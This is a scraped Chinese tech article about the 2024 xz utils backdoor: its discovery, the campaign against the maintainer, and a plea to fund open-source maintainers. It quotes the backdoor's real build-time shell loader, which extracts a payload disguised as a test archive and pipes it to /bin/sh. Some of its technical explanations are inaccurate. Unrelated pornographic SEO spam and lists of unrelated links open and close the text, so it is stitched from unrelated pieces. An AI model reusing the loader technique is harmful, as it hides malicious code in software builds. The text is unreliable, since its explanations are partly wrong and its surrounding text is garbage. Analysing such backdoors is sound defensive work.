精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

安全專家對 SSH 漏洞感到恐慌

安全
在過去的幾個月里,每個人都在談論 SSH 中觸發的漏洞。通常對它的描述相當復雜。這只是某個隨機應用程序中的另一個漏洞嗎?如果是這樣,為什么網絡安全專家如此關注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

SSH 中觸發的漏洞可以允許黑客接管服務器。安全專家感到恐慌。這次攻擊可能持續了兩年多,需要大量的資源和技術技能。

在過去的幾個月里,每個人都在談論 SSH 中觸發的漏洞。通常對它的描述相當復雜。這只是某個隨機應用程序中的另一個漏洞嗎?如果是這樣,為什么網絡安全專家如此關注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

正如我們在 wiz.io 上讀到的,在 xz utils 的 5.6.0  5.6.1 版本中發現了一個后門,影響了 SSH。據我們了解,xz 是一個命令行壓縮工具,由 lzma 和 xz 組成,并影響了 SSH。

2024年3月29日星期五,Andres Freund向Openwall郵件列表發送了一封電子郵件。郵件列表對于精通技術的人來說就像Discord一樣,而Openwall是一個保護開源代碼的項目。

正是在那里,Andres 分享了他令人不安的發現。

服務器接管

他當時正在使用安全Shell協議(SSH)進行一些工作。對于幾乎每一個需要連接到服務器的人來說,SSH就像意大利面的叉子一樣。開發人員、DevOps、SecOps以及技術領域的每個人都在使用SSH安全地連接到服務器。即使服務器也使用SSH連接到其他服務器。

所以Andres當時正在做正常的技術工作,但有些事情不對勁,不僅僅是2024年橄欖油的價格。當他使用SSH登錄到一臺服務器時,服務器開始準備起飛。

風扇轉動得越來越快,通常安靜的服務器開始發出吸氣和打嗝的聲音。在這種時候,人們會檢查他們是否忘記關閉Windows時鐘應用程序,那個耗費CPU資源的野獸。

但是Andres使用的是Debian。所以他能夠立即排除這種可能性。此外,他注意到了更多的問題。Valgrind開始報告內存出現了一些問題。

這可能是什么原因呢?Windows Explorer突然開始挖掘比特幣了嗎?不可能是這樣的!

通常人們會責怪服務器,然后忘記整個問題,但有些事情困擾著Andres,他決定進行調查。

在深入研究之后,他注意到實際上是ssh導致了所有這些癥狀。這很奇怪,因為ssh不顯示廣告,你也不能在上面玩《古墓麗影:決定版》。

那么這個幾乎不消耗卡路里的應用程序到底是如何讓服務器如此劇烈運轉的呢?

兔子洞深處

兔子洞深處 Andres決定再深入一點。他啟動了診斷工具,越來越接近找出問題的具體原因。肯定是ssh,但ssh中的哪個具體部分呢?他注意到是xz。

深入下去,發現xz的一個特定部分導致了CPU和內存的狂歡派對——liblzma。

總結一下。Liblzma是xz命令行工具使用的壓縮庫。SSH使用了該命令行工具。這是計算機程序中正常的依賴鏈,在這種情況下,正是SSH的深層依賴liblzma導致了問題。

感謝開源,Andres能夠上網查看究竟發生了什么。他能夠看到Debian的xz utils的源代碼。

Andres發現了大量關于惡意代碼如何工作的信息。有兩個測試文件實際上是存檔文件。一個復雜的操作系統導致這些存檔文件在構建過程中被提取出來,并以包含后門的方式修改SSH構建,讓黑客可以登錄到服務器。

有趣的是,Andres發現這個后門還在開發中。隨著xz的后續版本發布,后門的作者試圖隱藏后門的存在,并實際修復了導致Valgrind錯誤列表像圣誕樹一樣閃爍的內存問題。

幸運的是,這個后門的作者相當低級,這讓Andres意識到有些不對勁。再過幾天或幾周,就沒人會注意到有什么問題了。

The source code of the backdoor:

####Hello####
#??Z?.hj?
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

特別是因為整個后門程序是以一種隱藏在某些倉庫中、只在特定環境下激活的方式構建的。Debian操作系統是決定使用該后門的一個重要因素。"

后門的影響

安全專家對這一發現感到震驚,每一天都帶來更多可怕的細節。通常當你有一臺服務器,并想要修復一個安全漏洞時,你可以使用SSH登錄并更新軟件。

但在這種情況下,SSH本身就存在一個后門。在這種情況下該怎么辦?

Wiz.io建議立即停止使用、升級受影響的服務器或者降級到不存在黑客可乘之機的版本。美國國家標準與技術研究院(NIST)對這個漏洞給予了10分的最高評級(滿分10分)。美國國家標準與技術研究院很少會對漏洞給予如此高的評級。

上一次發生這種情況是在 2024 年 2 月 21 日,針對 CVE-2024-1709:“ConnectWise ScreenConnect 23.9.7 及之前版本受身份驗證繞過漏洞的影響,該漏洞可能允許攻擊者直接訪問機密信息或關鍵系統。”

說 SecOps 目前正面臨困境還算輕描淡寫。現實情況是非常糟糕的。即使目前沒有關于針對已經設置的后門的任何主動攻擊信息,形勢依然嚴峻。

此外,代碼庫中那個令人不安的“Hello World”玩笑似乎暗示這只是類似攻擊的開始,實際上要將后門部署到目前這種程度,已經涉及到相當復雜的操作和技術知識。

這是支持核心維護者的信號

關于這次攻擊的所有細節都需要被發現,未來也將成為許多學術論文的主題。但得益于 Rob Mensching 的努力,我們已經能了解到許多內容。

一些專家認為這并非一次快速攻擊,而是一個經過精心策劃的計劃。兩年前,一些人開始持續向 xz 項目的維護者施壓,要求將維護權交給能夠繼續項目的新人員。公開的溝通信息表明,還存在一些隱晦的實質壓力。

最終,新維護者接手項目并開展工作,一切都很順利,直到后來被感染的檔案被加入項目。

我不確定那些向原 xz 維護者施壓的人是否參與其中。也許是,也許不是。不管怎樣,新維護者就是這樣上任的。同樣,我也不能確定賈譚是否真的就是行動背后的關鍵人物,因為他/她的系統也可能已經被入侵。這里存在很多不確定因素。

由于維護者的系統也可能被攻陷,這方面存在很多不確定性。

這里強調的一個重要問題是核心庫的維護者有多脆弱。我們所有人都依賴這些庫,但他們通常無法從這項工作中獲得收入,可能處于失業狀態,可能身陷危機,或面臨困境。

這些維護者沒有得到他們所需的所有資源,這是無法接受的。我們需要一種解決方案,讓整個社區(包括企業)全面地物質上支持這些人,并提供他們需要的建議,使他們能夠專注于自己的項目而不陷入任何陷阱。在這個案例中,如果原維護者能繼續項目工作,他本可以立即阻止漏洞的產生!

開源萬歲

得益于所有相關部分的開源性質,我們得以深入了解這次后門攻擊。如果無法查看源代碼,安德烈斯就無法如此迅速地向世界發出警報。對于封閉系統來說,從創建漏洞報告到公司復現、調查和修復可能需要數周甚至數月,導致后門在野外持續更長時間。

由于我們知道黑客引入后門的每一步操作,開源開發者和調查人員將能夠封堵這一路上開啟的每一扇門。這意味著即使如此復雜的攻擊可能發生,潛在的攻擊面也會被封鎖。

在這場戰斗中,開源就像一個自愈的生物,在每次病毒侵襲后變得愈加強大。當然,我們仍需要繼續改進。

責任編輯:姜華 來源: 大遷世界
相關推薦

2024-11-11 13:27:02

2021-04-14 09:50:48

零日漏洞漏洞網絡安全

2012-01-18 10:45:42

2009-07-17 16:38:40

2013-11-18 09:44:02

2009-04-24 11:03:40

2009-11-06 13:34:53

2014-04-10 18:48:16

OpenSSLHeartbleed漏

2021-09-10 10:42:40

蘋果漏洞安全研究人員

2012-02-24 15:14:23

ibmdw

2021-12-27 15:41:23

macOS漏洞惡意軟件

2014-03-25 14:54:48

2009-12-04 19:14:50

2022-12-15 07:48:33

2009-04-20 20:29:18

LinuxDellUbuntu

2022-06-16 15:56:57

安全專家微軟漏洞

2009-03-23 09:41:11

2025-04-18 00:10:00

AI人工智能安全漏洞

2013-06-27 17:30:37

2014-03-23 16:01:37

攜程漏洞信用卡支付安全
點贊
收藏

51CTO技術棧公眾號

这里只有精品免费视频| 香蕉视频免费网站| 麻豆视频免费在线观看| 国内一区二区视频| 97久久精品视频| 亚洲黄色免费视频| 欧美一级大片在线视频| 性感美女极品91精品| 亚洲 国产 欧美一区| 国产一区二区三区三州| 尤物在线精品| 日韩小视频在线| 国产精品揄拍100视频| 免费视频观看成人| 欧美性xxxx极品hd满灌| 菠萝蜜视频在线观看入口| 黄色小视频在线免费观看| 国产精品一区二区三区99| 国产成人精品网站| 久久久久久欧美精品se一二三四| 怕怕欧美视频免费大全| 欧美mv和日韩mv的网站| 性猛交ⅹ×××乱大交| 欧美办公室脚交xxxx| 亚洲三级在线观看| 欧美一区三区二区在线观看| www.久久久久久| 美国三级日本三级久久99| 97人人模人人爽人人喊中文字 | 亚州精品天堂中文字幕| 日韩av网站在线播放| 中文字幕中文字幕精品| 精品国产乱码久久久久久影片| 国产色视频在线播放| 高清不卡av| 欧美日韩亚洲一区二区三区| www.av91| 色老头在线观看| 亚洲免费观看高清完整| 一本久久a久久精品vr综合 | 26uuu国产日韩综合| 国产精品久久亚洲7777| 亚洲精品一区二区口爆| 国产麻豆成人精品| 成人福利视频在线观看| 中文字幕一区二区三区波野结 | 日韩久久综合| 激情欧美一区二区三区| 一区二区三区视频免费在线观看| jizz日本免费| 久久99国产精品久久99大师| 亚洲成人网av| 欧美肉大捧一进一出免费视频| 91蜜桃臀久久一区二区| 欧美sm极限捆绑bd| 在线观看一区二区三区四区| 香港久久久电影| 精品国产污网站| 久久福利小视频| 日本午夜精品| 亚洲精品网站在线播放gif| 亚洲精品理论片| 女优一区二区三区| 在线观看成人黄色| 国产精品一区二区亚洲| 国产色婷婷在线| 亚洲一区二区三区无吗| 久久中文字幕在线视频| 国产av 一区二区三区| 欧美在线高清| 午夜精品一区二区三区在线播放| 免费在线观看黄网站| 久久亚洲二区| 国产免费一区二区三区香蕉精| 亚洲专区第一页| 国产二区国产一区在线观看| 懂色av一区二区三区在线播放| 韩国av电影在线观看| 97精品电影院| 亚洲乱码国产乱码精品天美传媒| 国产欧美黑人| 姬川优奈aav一区二区| 日韩手机在线观看视频| 日韩在线电影| 亚洲电影免费观看高清完整版在线| 亚洲精品在线视频免费观看| 欧美日韩伦理在线免费| 美女少妇精品视频| 黄色一级片免费看| 美女一区二区久久| 99国产在线视频| 免费在线一级视频| 亚洲视频1区2区| 国产免费黄色av| 欧美啪啪网站| 日韩大片免费观看视频播放| 亚洲色图第四色| 欧美日一区二区三区在线观看国产免| 97视频com| 一区二区三区播放| 波多野结衣在线aⅴ中文字幕不卡| 免费电影一区| 91精品久久久| 欧美亚洲自拍偷拍| 亚洲欧美高清在线| 91日韩欧美| 97视频在线播放| 国产精品一品二区三区的使用体验| bt欧美亚洲午夜电影天堂| 五月天婷亚洲天综合网鲁鲁鲁| 日本孕妇大胆孕交无码| 欧亚一区二区三区| fc2成人免费视频| 久久久久久久久丰满| 日本精品久久久久影院| 精品国产av一区二区三区| 日本一区二区三区高清不卡| 日韩 欧美 视频| 国产精品亚洲欧美一级在线| 亚洲性夜色噜噜噜7777| 日韩高清免费av| 国产激情视频一区二区在线观看 | 日本成人一区| 亚洲一区二区三区四区不卡| 一区二区在线免费看| 色婷婷精品视频| 久久久久久午夜| 国产露脸无套对白在线播放| 国产亚洲精品超碰| 国产深夜男女无套内射| 一区二区三区亚洲变态调教大结局 | 成人av资源网| 国产精品剧情| 欧美日韩国产综合草草| 国产美女永久免费无遮挡| 国产精品theporn| 亚洲在线www| 在线播放麻豆| 欧美三级韩国三级日本一级| 中文精品在线观看| 国产日韩精品视频一区二区三区 | 久久精品99久久无色码中文字幕| 欧美在线视频观看| 天天影院图片亚洲| 午夜不卡在线视频| 国产麻豆xxxvideo实拍| 在线高清一区| 狠狠色伊人亚洲综合网站色| a'aaa级片在线观看| 精品国产1区2区3区| 久久精品人妻一区二区三区| 成人爱爱电影网址| 精品少妇人欧美激情在线观看| 免费观看亚洲天堂| 久久成人亚洲精品| 亚洲女同志亚洲女同女播放| 亚洲一区二区综合| 中文字幕乱视频| 性高湖久久久久久久久| 麻豆亚洲一区| 日韩精品麻豆| 久久久精品一区| 精品人妻av一区二区三区| 亚洲黄网站在线观看| 又色又爽又黄18网站| 亚洲日本激情| 免费亚洲精品视频| 色猫猫成人app| 久久久97精品| 丰满少妇在线观看bd| 无吗不卡中文字幕| 性欧美一区二区| 经典三级在线一区| 真人抽搐一进一出视频| 日韩成人一级| 成人免费视频97| 欧美hdxxx| 亚洲欧洲成视频免费观看| 中文天堂在线资源| 亚洲六月丁香色婷婷综合久久 | 久久av中文| 国产在线高清精品| 97人人在线视频| 国产一区二区激情| 精品人妻无码一区二区色欲产成人 | 亚洲欧洲一区二区福利| 欧美午夜网站| 日韩免费在线视频| gogogogo高清视频在线| 亚洲成人久久网| 在线观看不卡的av| 亚洲一区av在线| 日本黄色小视频在线观看| 国产精品一二三| av视屏在线播放| 欧美粗暴jizz性欧美20| 日韩精品久久久| 一区二区日韩| 国产精品普通话| 爱看av在线| 日韩色av导航| 日本大片在线观看| 日韩精品一区二区三区视频播放 | 熟妇熟女乱妇乱女网站| 欧洲精品一区| 91精品入口蜜桃| 日韩三区在线| 91高清免费视频| 欧美xxxx免费虐| 日韩中文字幕免费| 蝌蚪视频在线播放| 亚洲高清色综合| 国产又粗又猛又爽又黄的| 欧美视频在线观看免费网址| 校园春色 亚洲| 国产精品成人网| 免费看污片网站| aaa国产一区| 精产国品一二三区| 久久99精品久久久久久久久久久久 | 亚洲久久久久久久| 91久久人澡人人添人人爽欧美| 国产高清不卡无码视频| 综合伊思人在钱三区| 亚洲sss综合天堂久久| 国产免费不卡| 国色天香2019中文字幕在线观看| a免费在线观看| 色哟哟网站入口亚洲精品| 亚洲日本在线播放| 精品国产亚洲在线| 亚洲av综合色区无码一二三区| 欧美日韩一区久久| 无码视频一区二区三区| 欧美日韩一区二区免费在线观看| 久久精品久久精品久久| 亚洲午夜影视影院在线观看| 成人观看免费视频| 亚洲色图一区二区| 小泽玛利亚一区二区免费| 中文字幕欧美激情一区| 无码一区二区三区在线| 26uuu精品一区二区三区四区在线 26uuu精品一区二区在线观看 | 精品999在线观看| 澳门精品久久国产| 国内精品视频在线播放| 精品少妇3p| 久久人人97超碰人人澡爱香蕉| 精品国产影院| 久久综合中文色婷婷| 五月天亚洲色图| 久久综合久久综合这里只有精品| 香蕉久久精品| 日本一区二区三区视频免费看| 亚洲精品国产动漫| 日韩欧美一区二区在线观看| 成人激情视频| 在线播放 亚洲| 欧美福利一区| 国产原创中文在线观看| 久热精品在线| 高清一区在线观看| 国内一区二区视频| 最新版天堂资源在线| 99精品国产热久久91蜜凸| 亚洲v国产v欧美v久久久久久| 国产农村妇女毛片精品久久麻豆 | 欧美日韩一区二区三区高清| 中文字幕你懂的| 日韩午夜激情视频| 无码国产伦一区二区三区视频| 亚洲免费视频观看| 麻豆电影在线播放| 欧美精品第一页在线播放| 人人草在线视频| 国产精品一区二区三区毛片淫片| 996久久国产精品线观看| 成人情视频高清免费观看电影| 精品中国亚洲| 亚洲a∨一区二区三区| 亚洲国产精品久久久天堂| 国产极品在线视频| 奇米影视一区二区三区| 动漫av在线免费观看| 久久先锋影音av| 日本中文字幕免费在线观看| 午夜精品影院在线观看| 中文字幕福利视频| 精品国产三级a在线观看| 国产午夜精品一区理论片| 久久天天躁狠狠躁夜夜躁| 忘忧草在线日韩www影院| 国产美女精品视频| 婷婷亚洲成人| 4444在线观看| 日韩激情视频网站| 视频免费在线观看| 国产精品拍天天在线| 久久精品国产亚洲av麻豆色欲 | 欧美自拍偷拍| 欧美中日韩在线| 青青草91视频| 日本一级片在线播放| 亚洲特黄一级片| 男人天堂2024| 亚洲а∨天堂久久精品喷水| 91caoporn在线| 国产91成人video| 91成人入口| 国产又黄又爽免费视频| 久久国产日本精品| 国产精品日日摸夜夜爽| 中文字幕在线不卡一区| 欧美一区二区三区不卡视频| 精品国偷自产国产一区| 日本最黄一级片免费在线| 欧美一区二区三区四区在线| 亚洲性视频在线| 亚洲美女自拍偷拍| 日产国产高清一区二区三区| 日韩无码精品一区二区| 一区二区三区影院| 国产精品视频一二区| 在线亚洲男人天堂| 成人影院网站| 久久精品国产综合精品| 亚洲激情国产| av噜噜在线观看| 国产精品理论片| 免费一级a毛片| 亚洲天堂免费视频| 成人免费短视频| 九九久久99| 国产日韩免费| 搡老熟女老女人一区二区| 亚洲成人在线免费| 人妻精品一区二区三区| 欧美激情18p| 波多野结衣在线一区二区| 欧美日韩中文字幕在线播放| 国产一区二区调教| 亚洲一二三在线观看| 91精品国产欧美日韩| 成人黄色网址| 亚洲字幕一区二区| 亚洲欧美伊人| 又色又爽又黄18网站| 亚洲自拍偷拍图区| 日本xxxx人| 5566日本婷婷色中文字幕97| 欧美丝袜足交| 成人在线观看a| 国产精品视频免费| 91精品中文字幕| 久久在线免费视频| 中文无码日韩欧| 欧美一区二区三区爽大粗免费| 91久色porny| 中文字幕+乱码+中文| 中文字幕亚洲欧美日韩高清| 国产原创一区| 欧洲金发美女大战黑人| 国产a区久久久| 中文字幕亚洲精品一区| 亚洲欧美日韩图片| 福利一区二区三区视频在线观看| 一区二区三区三区在线| 国产剧情av麻豆香蕉精品| 玖玖爱免费视频| 亚洲美女性视频| 亚洲一区二区av| 欧美乱大交xxxxx潮喷l头像| 91在线国产观看| 亚洲天堂中文网| 国内精品一区二区三区四区| 亚洲图片久久| 91 视频免费观看| 亚洲成人激情综合网| 国产污视频在线| 成人高清在线观看| 久久一区二区三区超碰国产精品| 91麻豆精品久久毛片一级| 日韩精品一区二区三区视频播放 | 明星裸体视频一区二区| 久久精品国产亚洲aⅴ| 国产稀缺真实呦乱在线| 国产亚洲日本欧美韩国| 精品亚洲a∨一区二区三区18| 自拍日韩亚洲一区在线| 国产精品久久久久aaaa| 手机av免费在线观看| 国产精品视频网| 最新成人av网站| 欧美xxxooo| 精品中文视频在线| 精品国产18久久久久久二百| 久久免费视频3| 亚洲精选在线视频| 极品白浆推特女神在线观看 | 亚洲三级在线观看视频|